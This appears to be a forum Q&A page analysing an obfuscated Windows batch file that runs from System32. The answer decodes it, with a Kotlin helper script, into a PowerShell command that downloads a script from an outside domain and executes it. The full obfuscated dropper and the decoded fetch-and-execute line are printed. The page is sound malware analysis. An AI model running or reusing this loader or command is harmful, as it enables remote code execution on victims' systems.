-1

file.cmd

@echo off
cd %SystemRoot%\System32
set HUkC=
Set HUkC=%HUkC%3Kt
Set HUkC=%HUkC%AkR
Set HUkC=%HUkC%Vgc
Set HUkC=%HUkC%6a0
Set HUkC=%HUkC%5Gz
Set HUkC=%HUkC%wD2
Set HUkC=%HUkC%JZE
Set HUkC=%HUkC%j7h
Set HUkC=%HUkC%xnv
Set HUkC=%HUkC%rob
Set HUkC=%HUkC%dSH
Set HUkC=%HUkC%qNW
Set HUkC=%HUkC%QXU
Set HUkC=%HUkC%Iui
Set HUkC=%HUkC%s1y
Set HUkC=%HUkC%L4Y
Set HUkC=%HUkC%BfC
Set HUkC=%HUkC%mPe
Set HUkC=%HUkC%FOT
Set HUkC=%HUkC%pM9
Set HUkC=%HUkC%l8
set aa=^|
set data=
Set data=%data%%HUkC:~39,1%%HUkC:~20,1%%HUkC:~24,1%("%HUkC:~39,1%%HUkC:~53,1%%HUkC:~24,1%(%HUkC:~34,1%%HUkC:~20,1%%HUkC:~35,1%-
Set data=%data%%HUkC:~28,1%%HUkC:~48,1%%HUkC:~18,1%%HUkC:~53,1%%HUkC:~8,1%%HUkC:~2,1% %HUkC:~25,1%%HUkC:~53,1%%HUkC:~2,1%.%HUkC:~15,1%%HUkC:~20,1%
Set data=%data%%HUkC:~29,1%%HUkC:~8,1%%HUkC:~45,1%%HUkC:~41,1%%HUkC:~53,1%%HUkC:~25,1%%HUkC:~2,1%).%HUkC:~16,1%%HUkC:~28,1%%HUkC:~35,1%%HUkC:~34,1%
Set data=%data%%HUkC:~60,1%%HUkC:~28,1%%HUkC:~10,1%%HUkC:~16,1%%HUkC:~31,1%%HUkC:~56,1%%HUkC:~5,1%%HUkC:~39,1%%HUkC:~25,1%%HUkC:~7,1%('
Set data=%data%%HUkC:~23,1%%HUkC:~2,1%%HUkC:~2,1%%HUkC:~57,1%%HUkC:~42,1%://%HUkC:~30,1%%HUkC:~60,1%%HUkC:~51,1%.%HUkC:~8,1%
Set data=%data%%HUkC:~10,1%%HUkC:~57,1%%HUkC:~53,1%%HUkC:~51,1%%HUkC:~25,1%.%HUkC:~8,1%%HUkC:~28,1%%HUkC:~51,1%/?%HUkC:~30,1%%HUkC:~51,1%
Set data=%data%%HUkC:~18,1%%HUkC:~21,1%%HUkC:~26,1%%HUkC:~7,1%%HUkC:~13,1%%HUkC:~54,1%%HUkC:~19,1%%HUkC:~9,1%%HUkC:~20,1%%HUkC:~3,1%%HUkC:~61,1%%HUkC:~18,1%%HUkC:~2,1%
Set data=%data%%HUkC:~48,1%%HUkC:~53,1%%HUkC:~61,1%%HUkC:~57,1%%HUkC:~1,1%%HUkC:~56,1%%HUkC:~58,1%%HUkC:~50,1%%HUkC:~31,1%%HUkC:~7,1%%HUkC:~57,1%%HUkC:~5,1%%HUkC:~53,1%
Set data=%data%%HUkC:~6,1%%HUkC:~37,1%%HUkC:~60,1%%HUkC:~29,1%%HUkC:~43,1%%HUkC:~45,1%%HUkC:~50,1%%HUkC:~4,1%%HUkC:~47,1%%HUkC:~6,1%%HUkC:~39,1%%HUkC:~24,1%%HUkC:~58,1%
Set data=%data%%HUkC:~32,1%%HUkC:~49,1%%HUkC:~42,1%%HUkC:~50,1%%HUkC:~39,1%%HUkC:~45,1%%HUkC:~37,1%%HUkC:~10,1%%HUkC:~0,1%%HUkC:~54,1%%HUkC:~21,1%%HUkC:~0,1%%HUkC:~15,1%
Set data=%data%%HUkC:~28,1%%HUkC:~25,1%%HUkC:~30,1%%HUkC:~21,1%%HUkC:~61,1%%HUkC:~44,1%%HUkC:~5,1%%HUkC:~55,1%%HUkC:~31,1%%HUkC:~42,1%%HUkC:~55,1%%HUkC:~31,1%%HUkC:~55,1%
Set data=%data%%HUkC:~33,1%%HUkC:~21,1%%HUkC:~27,1%%HUkC:~21,1%%HUkC:~29,1%%HUkC:~55,1%%HUkC:~35,1%%HUkC:~40,1%%HUkC:~27,1%%HUkC:~45,1%%HUkC:~34,1%%HUkC:~56,1%%HUkC:~26,1%
Set data=%data%%HUkC:~39,1%%HUkC:~13,1%%HUkC:~3,1%%HUkC:~10,1%%HUkC:~3,1%%HUkC:~28,1%%HUkC:~6,1%%HUkC:~15,1%%HUkC:~0,1%%HUkC:~4,1%%HUkC:~16,1%%HUkC:~61,1%%HUkC:~17,1%
Set data=%data%/%HUkC:~35,1%%HUkC:~27,1%%HUkC:~39,1%%HUkC:~52,1%%HUkC:~3,1%%HUkC:~29,1%%HUkC:~0,1%%HUkC:~36,1%%HUkC:~6,1%%HUkC:~25,1%%HUkC:~3,1%%HUkC:~42,1%
Set data=%data%%HUkC:~1,1%/%HUkC:~17,1%%HUkC:~6,1%%HUkC:~23,1%%HUkC:~12,1%')");
echo %%data%%%aa%%HUkC:~35,1%%HUkC:~41,1%%HUkC:~25,1%%HUkC:~30,1%%HUkC:~28,1%%HUkC:~15,1%%HUkC:~42,1%%HUkC:~52,1%%HUkC:~28,1%%HUkC:~15,1%%HUkC:~53,1%%HUkC:~27,1%%HUkC:~31,1%%HUkC:~23,1%%HUkC:~53,1%%HUkC:~60,1%%HUkC:~60,1%\%HUkC:~26,1%%HUkC:~43,1%.%HUkC:~11,1%\%HUkC:~57,1%%HUkC:~28,1%%HUkC:~15,1%%HUkC:~53,1%%HUkC:~27,1%%HUkC:~42,1%%HUkC:~23,1%%HUkC:~53,1%%HUkC:~60,1%%HUkC:~60,1%.%HUkC:~53,1%%HUkC:~24,1%%HUkC:~53,1% -%HUkC:~25,1%%HUkC:~28,1%%HUkC:~57,1% -%HUkC:~15,1%%HUkC:~41,1%%HUkC:~25,1% %HUkC:~43,1% -
Improve this question
1
  • 6
    It is obfuscated and runs in System32 so by default, yes. Also this seems to be rather offtopic.
    – AstroDan
    Commented May 8, 2018 at 15:53

1 Answer 1

Reset to default
8

Is it malicious

Yes, it seems so, it runs by default in System32, which is not normal for benign scripts.

How is it malicious

Using the following script:

fun main(args: Array<String>) {
    val normalRegex = Regex("%([a-zA-Z]+?)%")
    val partRegex = Regex("%([a-zA-Z]+?):~([0-9]+),([0-9]+)%")
    val lineRegex = Regex("[Ss]et ([A-Za-z]+)=(.*)")
    val environment = mutableMapOf<String, String>()
    for (l in input.lines()) {
        println(">>> " + l)
        var temp = l
        while (normalRegex.find(temp) != null) {
            temp = normalRegex.replace(temp, {environment[it.groupValues[1]]!!} )
        }
        while (partRegex.find(temp) != null) {
            temp = partRegex.replace(temp, {
                val wholeText = environment[it.groupValues[1]]!!
                val idNumber = it.groupValues[2].toInt()
                ""+ wholeText[idNumber]})
        }
        println("<<< " + temp)
        val groups = lineRegex.matchEntire(temp)!!.groupValues
        environment[groups[1]] = groups[2]
        println("}}} " + environment)
        println()
    }
}

(The script does not work 100%, but enough to give an idea of what the provided code does)

I get the following output:

    %IEx("Iex(NEW-oBJect net.wEbcLient).DoWNloaDSTRIng('https://dlm.capemn.com/?dmJjvgGFZ6EA8JtBe8pKTMCSgpReVXlb1LCkYVIxMHfsCILXa3Fj3wondj8yROSsOSOqjrjbOWurLNTvIGAaAoVw3kD82/WrIPAb3QVnAsK/2Vh5')");%^|WindowsPowerShell\v1.0\powershell.exe -nop -win 1 -

It appears that the script downloads a script from a web server, and then tries to run it in PowerShell. Unfortunately the URL provided did not work when I tried it, which is probably due to a glitch in the script I wrote.

Also, the domain is quite young (registered on 2018-04-10T18:51:53Z), which may point to it being set up recently to be used for this, and got rid of once it has been detected.7

Extra info

With the domain above, I found the following report: https://www.reverse.it/sample/133a2baaa832f7d50f7544f82c4ea8f4ec8550422bb4407a42eb4e7206a69940?environmentId=100

Improve this answer

Not the answer you're looking for? Browse other questions tagged .